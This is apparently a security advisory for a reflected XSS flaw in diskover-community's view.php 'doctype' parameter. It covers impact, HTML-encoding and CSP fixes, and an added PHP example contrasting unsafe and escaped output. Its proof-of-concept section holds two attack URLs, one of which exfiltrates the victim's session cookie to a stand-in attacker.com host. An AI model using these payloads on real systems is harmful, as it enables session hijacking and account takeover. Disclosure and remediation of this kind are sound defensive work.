# CVE-2026-38935 Vulnerability Summary

## Vulnerability Overview

- **Vulnerability Type**: Reflected Cross-Site Scripting (Reflected XSS)
- **Affected Component**: `public/view.php` in `diskover-community`
- **Vulnerable Parameter**: `doctype` parameter
- **Vulnerability Description**:
  - The user-supplied `doctype` parameter is neither filtered nor escaped and is concatenated directly into an HTML tag's `href` attribute.
  - Attackers can craft malicious links; when a victim clicks such a link, the attacker's JavaScript executes in the victim's browser.

## Impact Scope

- **Affected Versions**: `diskover-community` versions less than or equal to 2.3.5.
- **Impact Scope**:
  - Affects all authenticated users, including administrators.
  - Contains 8 independent injection points.
  - Can lead to PHP session hijacking, allowing attackers to steal the victim's `PHPSESSID` and take over the account.
  - Can be combined with CVE-2026-38934 (CSRF) to achieve automated account takeover.

## Remediation

1. **Code Fix**: In `public/view.php`, apply HTML entity encoding to every instance of `$_REQUEST['doctype']` used in an `echo` statement.

   ```php
   // Sanitize all echo points
   echo htmlspecialchars($_REQUEST['doctype'], ENT_QUOTES, 'UTF-8');
   ```

2. **Security Policy**: Add a Content Security Policy (CSP) header to restrict script sources:

   ```
   Content-Security-Policy: default-src 'self'
   ```

## Proof of Concept (POC)

**1. Session Hijacking**

```html
http://TARGET/view.php?id=test&file=&index=diskover-test&doctype=">alert(document.cookie)
```

**2. Silent Cookie Exfiltration**

```html
http://TARGET/view.php?id=test&file=&index=diskover-test&doctype=">fetch('https://attacker.com/steal?c='+document.cookie)
```
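To make the Remediation section concrete, the following is an added example (not code from `diskover-community` itself) showing the unescaped pattern beside the `htmlspecialchars` fix in attribute context, with a constructed probe value; the function names and the `view.php?doctype=` link shape are assumptions for illustration.

```php
<?php
// Added example, not diskover-community's own code. Shows why encoding the
// doctype value for HTML attribute context stops an attribute breakout.
declare(strict_types=1);

// Illustrative vulnerable pattern: the raw request value is dropped into href.
function build_link_unsafe(string $doctype): string
{
    return '<a href="view.php?doctype=' . $doctype . '">view</a>';
}

// Hardened pattern from the advisory: ENT_QUOTES escapes both " and ', so the
// value stays inert whether the attribute is double- or single-quoted.
function build_link_safe(string $doctype): string
{
    $enc = htmlspecialchars($doctype, ENT_QUOTES, 'UTF-8');
    return '<a href="view.php?doctype=' . $enc . '">view</a>';
}

// True when the encoded value contains none of the characters that can
// close an attribute or open a tag (a quick self-check, not a full parser).
function attr_value_is_inert(string $encoded): bool
{
    return strpbrk($encoded, "\"'<>") === false;
}

// Sends the CSP header from the remediation section; it must be emitted
// before any output, otherwise header() is a no-op and PHP warns.
function send_csp(): void
{
    if (!headers_sent()) {
        header("Content-Security-Policy: default-src 'self'");
    }
}

// Constructed probe: a double quote closes the attribute, "<" starts a tag.
$probe = '"><b>x</b>';

echo "unsafe: ", build_link_unsafe($probe), PHP_EOL;
echo "safe:   ", build_link_safe($probe), PHP_EOL;

$encoded = htmlspecialchars($probe, ENT_QUOTES, 'UTF-8');
echo "raw value inert? ", attr_value_is_inert($probe) ? 'yes' : 'no', PHP_EOL;
echo "encoded value inert? ", attr_value_is_inert($encoded) ? 'yes' : 'no', PHP_EOL;
```

Run it with `php example.php`: the unsafe line shows the probe escaping the `href` attribute, while the safe line keeps it inside the attribute as entities, and the CSP header is a second, independent layer that still applies if an encoding call is missed at one of the injection points.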